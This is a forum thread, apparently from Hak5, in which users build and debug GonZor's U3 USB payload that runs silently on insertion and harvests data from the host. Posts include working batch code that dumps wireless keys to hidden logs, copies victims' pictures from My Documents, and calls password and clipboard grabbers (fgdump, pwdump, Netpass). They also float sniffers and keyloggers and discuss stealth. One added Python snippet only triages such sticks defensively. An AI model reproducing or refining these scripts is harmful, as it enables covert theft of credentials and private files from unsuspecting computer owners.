
~Gozor~ Finished Payload


setzer1411


Thanks Gonzor.

It could be interesting for the next versions to add some features, like trying to catch domain passwords (I don't know if this could be possible) or installing some kind of sniffer to get passwords "on the fly".

Another idea is to add a keylogger...

What do you think about it?

The "sniffer" is possible, I made something similar a while back and then just used sniffpass to filter the raw packets. The problem is the need to silently install WinPcap. I don't like the idea of key loggers and I don't think I will be adding one to my payload.


darkjoker, I received that error a few times, but mainly on a media centre PC. What OS gives you that? A Google search seems to show results for all kinds of USB devices, and therefore I do not think it's the payload that gives that problem.

Erdnase, can I guess where you got your nickname from? Anything to do with S. W. Erdnase's Expert at the Card Table?


I also get the

"Windows - No disk

Exception Processing Message c00000013 Parameters 75b4bf7c 75b4bf7c" error, and it doesn't disappear until I've clicked one of the alternatives like 10 times.

The log is written, but it isn't very stealthy when you get that error...

Win XP, SP2

Cruzer Titanium 2 GB (U3)


Some websites regarding this error:

http://wook.wordpress.com/2007/06/25/excep...6bf9c-75b6bf9c/

http://forums.techguy.org/business-applica...ocessing-3.html

http://my.opera.com/opera-usb/forums/topic.dml?id=187458

Seems to be something to do with Norton and/or QuickTime.

Can everyone who is getting this error please tell me what AV they have (if any), and whether they have QuickTime installed?


Hehe, the funny thing is that I have also been into magic. Seems like magicians have a strong attraction to hak5 :lol:

On topic: I do not have Norton or any other Symantec software, but I do have QuickTime installed.

I'm so sad that I get this error message; otherwise this would be the perfect payload for me.

Really hope Gonzor finds out what's going on and uploads a stable, non-bugging version soon.

Keep up the good work!


Whoa. All magicians in the house, give me your MSN Messenger (preferably, or iChat/AIM) addresses!

Sorry for this off-topic stuff.

Me and Gonzor are working on a new part of the payload. I won't give much away, I'll let Gonzor do that, but it seems to be quite useful, and I'm sure more will be told as we develop it.


@ GonZor

Was wondering if you or anyone could help me with something. I'm looking at your go.bat file and it is coded very nicely. A bit more complex than the original switchblade.

Say I want to have my USB stick (Memorex Mini 256 Travel Drive) do just one job: dump wireless keys. I flash the drive with the Universal Customizer with a file to autorun wifi.bat, including in that file:

Echo ************************************ >> ....Documentslogfiles%computername%.log 2>&1

echo **********[Dump Wireless Key]******* >> ....Documentslogfiles%computername%.log 2>&1

Echo ************************************ >> ....Documentslogfiles%computername%.log 2>&1

  .wkv.exe /stext "....Documentslogfiles%computername%_wk.log" >> ....Documentslogfiles%computername%.log 2>&1

  copy ....Documentslogfiles%computername%.log+....Documentslogfiles%computername%_wk.log* ....Documentslogfiles%computername%.log  >> nul

  del /f /q "....Documentslogfiles%computername%_wk.log" >nul

The U3 partition is set up as follows:

autorun.ini [tells it to run autoexec.bat]

autoexec.bat [tells it to run Files\AutoRun.bat]

Files dir. contents:

Files\AutoRun.bat [calls wifi.bat]

Files\wifi.bat

Files\wkv.exe

My problem is it will not write to the removable part of the drive for nothing in the world. I'm sure it is something with the path part of the code. I've tried changing it to:

..

....

..

Still no luck. Any suggestions? Anybody?


You need to detect where the flash partition is mapped. Looking at my go.bat you will notice that I have done this by searching for a .dat file which is on the flash partition. Normally you will need to create the file manually, but SBConfig.exe does this for you when you use my payload.

:: DETERMINE WHERE THE DRIVES ARE MAPPED
FOR %%i IN ( B C D E F G H I J K L M N O P Q R S T U V W X Y Z ) DO (
    IF EXIST %%i:\NUL.EXT (
        :: SEARCH FOR A FILE CALLED drv.dat IN THE DIRECTORY System\SRC
        IF EXIST %%i:\System\SRC\drv.dat (
            SET fd=%%i:\System\
        )
    )
)

:: CREATE LOG DIRECTORY
IF NOT EXIST %fd%Logs\%computername% (
    MD %fd%Logs\%computername%
)
:: COUNT NUMBER OF PREVIOUS LOGS FROM THIS COMPUTER SO THAT WE DO NOT OVERWRITE A LOG
DIR /a-d /s "%fd%Logs\%computername%" | FIND /c ".log" > "%fd%SRC\###"
SET /p count=<"%fd%SRC\###"
:: SET LOG PATH
SET log="%fd%Logs\%computername%\%computername%-[%count%].log"

Create a file on your flash partition called System\SRC\drv.dat. Place the above at the top of your go.bat; now when you refer to your log file, use %log%. This will expand to X:\System\Logs\%computername%\%computername%-[%count%].log, where X is the flash drive letter and count is the number of logs already in the folder for that computer.
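A defender-side triage check for the on-disk layout this post describes, written as an added example that is not GonZor's code and not part of the original thread: given the root of a mounted or imaged stick, it reports whether the System\SRC\drv.dat marker is present and which host names have logs under System\Logs. The backslash-separated paths are a reconstruction of the separators the forum export stripped, and the sample tree is constructed, not captured data.

```python
import os
import re
import tempfile

# Artefact layout described in the thread, with the path separators that the
# forum export stripped restored (so the exact paths are an assumption): the
# marker System\SRC\drv.dat the payload uses to locate its writable partition,
# and per-host logs System\Logs\<COMPUTERNAME>\<COMPUTERNAME>-[<n>].log.
MARKER = os.path.join("System", "SRC", "drv.dat")
LOG_RE = re.compile(r"^(?P<host>.+)-\[(?P<n>\d+)\]\.log$")


def triage_removable_root(root):
    """Return {"marker": bool, "hosts": {host: sorted log indices}} for a stick.
    A log counts for a host only when its file-name prefix equals the directory
    it sits in, which is how the batch script names them; other files are ignored."""
    result = {"marker": os.path.isfile(os.path.join(root, MARKER)), "hosts": {}}
    logs_dir = os.path.join(root, "System", "Logs")
    if not os.path.isdir(logs_dir):
        return result
    for host in sorted(os.listdir(logs_dir)):
        host_dir = os.path.join(logs_dir, host)
        if not os.path.isdir(host_dir):
            continue
        for name in os.listdir(host_dir):
            m = LOG_RE.match(name)
            if m and m.group("host") == host:
                result["hosts"].setdefault(host, []).append(int(m.group("n")))
    for indices in result["hosts"].values():
        indices.sort()
    return result


def build_sample_tree():
    """Constructed sample layout (not captured data) so the check runs offline."""
    root = tempfile.mkdtemp(prefix="u3_triage_")
    os.makedirs(os.path.join(root, "System", "SRC"))
    open(os.path.join(root, MARKER), "w").close()
    for host, n in (("DESKTOP1", 2), ("LAPTOP7", 1)):
        host_dir = os.path.join(root, "System", "Logs", host)
        os.makedirs(host_dir)
        for i in range(n):
            open(os.path.join(host_dir, f"{host}-[{i}].log"), "w").close()
    # a stray file that does not follow the naming scheme must be ignored
    open(os.path.join(root, "System", "Logs", "LAPTOP7", "notes.txt"), "w").close()
    return root
```

Calling triage_removable_root(build_sample_tree()) returns the marker flag plus {"DESKTOP1": [0, 1], "LAPTOP7": [0]}, i.e. how many visits each host name appears to have logged.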


Nice job! I'm doing some tweaks to it now and compiling the batch files to executables, etc. But one thing struck me as odd, and most likely it's my relatively vacant use of batch files. You seem to use the " mark singularly.

such as:

SET U3="%%i:\SRC\

or

IF EXIST %include%1.dat" (

What is the reason for this? Typically I've seen the use of the \ as an escape character, and I'm used to seeing the " being used in pairs to enclose items with spaces or for literal meaning.

Just curious.


In certain situations you'll notice I do use " in pairs, and ultimately they end up being used in pairs anyway. Generally, if I am setting a folder path I will use a single " at the beginning, but if I am setting a path to a file I will enclose it in " marks (I know that makes no sense, but you will have to forgive me, I have had no sleep).

SET include="G:\SRC\Include\

IF EXIST %include%0.dat"

When the second line is expanded it will look like this:

"G:\SRC\Include\0.dat"

Note the " on either end. If I were to enclose each in " like so:

SET include="G:\SRC\Include\"

IF EXIST "%include%0.dat"

When the second line is expanded it will look like this, and fail:

""G:\SRC\Include\"0.dat"

To simplify my code I could get away without using any " for this situation, but it is just a habit I have picked up.

Sorry about the rough quick explanation. If it doesn't make sense I can attempt another explanation after I've had some sleep.

I'm doing some tweaks to it now and compiling the batch files to executables, etc.

I'd love to take a look at the tweaks you've made, as well as the executable. What language?


Ok GonZor,

I'm really trying to understand this part of your code and I think I got it.

:: DETERMINE WHERE THE DRIVES ARE MAPPED
FOR %%i IN ( B C D E F G H I J K L M N O P Q R S T U V W X Y Z ) DO (

Searches every drive letter for a possible removable flash drive.

    IF EXIST %%i:\NUL.EXT (

Searches for the drive letter defined as %%i with a null value extension.

        :: SEARCH FOR A FILE CALLED drv.dat IN THE DIRECTORY System\SRC
        IF EXIST %%i:\System\SRC\drv.dat (
            SET fd=%%i:\System\
        )

Looks for a specific file, System\SRC\drv.dat, in order to identify the drive.

If that's the case, what exactly is fd in "SET fd=%%i:\System\"?


In certain situations you'll notice I do use " in pairs, and ultimately they end up being used in pairs anyway. Generally, if I am setting a folder path I will use a single " at the beginning, but if I am setting a path to a file I will enclose it in " marks (I know that makes no sense, but you will have to forgive me, I have had no sleep).

SET include="G:\SRC\Include\

IF EXIST %include%0.dat"

When the second line is expanded it will look like this:

"G:\SRC\Include\0.dat"

Note the " on either end. If I were to enclose each in " like so:

SET include="G:\SRC\Include\"

IF EXIST "%include%0.dat"

When the second line is expanded it will look like this, and fail:

""G:\SRC\Include\"0.dat"

To simplify my code I could get away without using any " for this situation, but it is just a habit I have picked up.

Sorry about the rough quick explanation. If it doesn't make sense I can attempt another explanation after I've had some sleep.

I'm doing some tweaks to it now and compiling the batch files to executables, etc.

I'd love to take a look at the tweaks you've made, as well as the executable. What language?

It makes perfect sense. I just didn't realize that you could do that. I'm used to " denoting a string data type and that it has to have a closing ". Or in some cases 3 ", which is what I expected to see in your code. But that tends to muck things up, so instead I'll use chr(34) or equivalent and concatenation.

I guess the batch file environment is more forgiving, being an interpreted language, but it makes the syntax highlighting in ExeScript go goofy.

That's what I'm using to compile the batches (ExeScript). Albeit it's still just a batch file with an exe wrapper. Not a real executable, yet.

One thing I've done is changed the layout for the log file:

ECHO +-----------------------------------+ >> %log% 2>&1
ECHO |          [System info]            | >> %log% 2>&1
ECHO +-----------------------------------+ >> %log% 2>&1

I find the above easier on the eyes than the old ***** method.

I'm also going to add in a safety file, time-date stamp, grab clipboard contents and other minor tweaks. I'll post when it's done.

The one thing I do like is that you still have Launchpad functionality and the tools are on the CD-ROM partition rather than flash. I'm also going to verify fgdump as I've never gotten that to work and used an older pwdump instead.


Found the following issues

| was being used as a piped command where I think your intention was for it to be a pipe character.

If you have a multi-card USB hub or other USB holder with no disk, the FOR loop will cause errors to be displayed to the user about "no disk present" abort, retry, fail.

Count script sometimes returns "volume in drive d is removable" (where d is variable); this screws up the file name and you get

computername-[volume in drive d is removable].log

I'm investigating root cause.


@ GonZor,

Using your script with file.exe and it isn't working; am I doing something wrong?

@echo off

:: DETERMINE WHERE THE DRIVES ARE MAPPED
FOR %%i IN ( B C D E F G H I J K L M N O P Q R S T U V W X Y Z ) DO (
    :: SEARCH FOR A FILE CALLED drv.dat IN THE DIRECTORY System\SRC
    IF EXIST %%i:\System\SRC\drv.dat (
        SET fd=%%i:\System\SRC\
    )
)

:: CREATE LOG DIRECTORY
IF NOT EXIST %fd%Logs\%computername% (
    MD %fd%Logs\%computername%
)
:: COUNT NUMBER OF PREVIOUS LOGS FROM THIS COMPUTER SO THAT WE DO NOT OVERWRITE A LOG
DIR /a-d /s "%fd%Logs\%computername%" | FIND /c ".log" > "%fd%SRC\###"
SET /p count=<"%fd%SRC\###"
:: SET LOG PATH
SET log="%fd%Logs\%computername%\%computername%-[%count%].log"

:: CREATE PIC DIRECTORY
IF NOT EXIST %fd%Documents\%computername%\Pictures (
    MD %fd%Documents\%computername%\Pictures
)

file.exe /A:C "%Documents and Settings%\%username%\My Documents\*.jpg" "Documents\%computername%\Pictures" /I /P

file.exe /A:C "%Documents and Settings%\%username%\My Documents\*.bmp" "Documents\%computername%\Pictures" /I /P

file.exe /A:C "%Documents and Settings%\%username%\My Documents\*.gif" "Documents\%computername%\Pictures" /I /P


@ GonZor,

Using your script with file.exe and it isn't working; am I doing something wrong?

To be honest I have never used file.exe, so I am unfamiliar with how it's used, but looking at your code, I am going to assume the last three lines should look like this:

file.exe /A:C "%Documents and Settings%\%username%\My Documents\*.jpg" "%fd%Documents\%computername%\Pictures" /I /P

file.exe /A:C "%Documents and Settings%\%username%\My Documents\*.bmp" "%fd%Documents\%computername%\Pictures" /I /P

file.exe /A:C "%Documents and Settings%\%username%\My Documents\*.gif" "%fd%Documents\%computername%\Pictures" /I /P

Assuming the syntax is file.exe /A:C <source> <destination> /I /P, this should work fine now. The problem was you were saying the destination was on the CD partition (and you obviously can't write to a CDFS partition).


Hey Gonzor,

Just wanna report in some personal bug feedback.

I am getting this message:

======================

Windows - No Disk                          X

======================

X    There is no disk in the drive.

      Please insert a disk into drive.

|Cancel|  |Try Again|  |Continue|

And it is the cmd.exe process that is running during this error. This also occurs when Netpass runs (even when Netpass is disabled [WTF?]).

Otherwise, the rest of the payload works like a charm.  Hacksaw works perfectly - just as long as I log in and stuff like you said.  Keep up the good work!


@ GonZor,

Ahhh, makes total sense. Thanks man really appreciate it. I'm gonna definitely try that out tonight:)

Oh yeah, I forgot: the logs. It does create log folders, but doesn't actually create any logs. It creates the folders in the SRC directory, but I'll mess around with that tonight also.


Just one question, a little confused. Still not working, but it could just be a file.exe issue; according to the following code:

@echo off

:: DETERMINE WHERE THE DRIVES ARE MAPPED
FOR %%i IN ( B C D E F G H I J K L M N O P Q R S T U V W X Y Z ) DO (
    :: SEARCH FOR A FILE CALLED drv.dat IN THE DIRECTORY System\SRC
    IF EXIST %%i:\System\SRC\drv.dat (
        SET fd=%%i:\System\SRC\
    )
)

It looks to me like you're defining the flash partition as drive i:; I don't see how it gets defined as %fd%.


It looks to me like you're defining the flash partition as drive i:; I don't see how it gets defined as %fd%.

Sorry if this makes no sense at all, just got home from a party. I'll try to explain each line individually.

:: DETERMINE WHERE THE DRIVES ARE MAPPED
FOR %%i IN ( B C D E F G H I J K L M N O P Q R S T U V W X Y Z ) DO (

FOR %variable IN (set) DO <command>

%variable specifies a single-letter variable (my chosen variable is %%i).

(set) specifies what the variable will be each time (in this case the alphabet).

<command> specifies the command to do with each variable in the set (in this case I used an open bracket just for readability).

    :: SEARCH FOR A FILE CALLED drv.dat IN THE DIRECTORY System\SRC
    IF EXIST %%i:\System\SRC\drv.dat (

The first command for each variable: IF EXIST <file> <command>

<file> specifies the file to search for (in this case we are searching for the file System\SRC\drv.dat, but this can be changed to any file).

<command> specifies the command to do if the file exists (once again I used an open bracket for readability; I find it easier).

        SET fd=%%i:\System\SRC\

This is the command to be completed once the file is found to exist: SET <variable>=<string>

<variable> specifies the variable that we will later call on to expand into the string (in this case the variable is fd and is later called as %fd%).

<string> specifies what we want the variable to expand to when it is called (in this case we want it to expand to the drive letter and the folder path System\SRC\).

    )
)

These are just the closing brackets for both statements, the first closing the IF EXIST command and the second closing the FOR command.

This could be written as one line, but for readability I use the brackets. I hope that made sense, but time now for some sleep :shock:
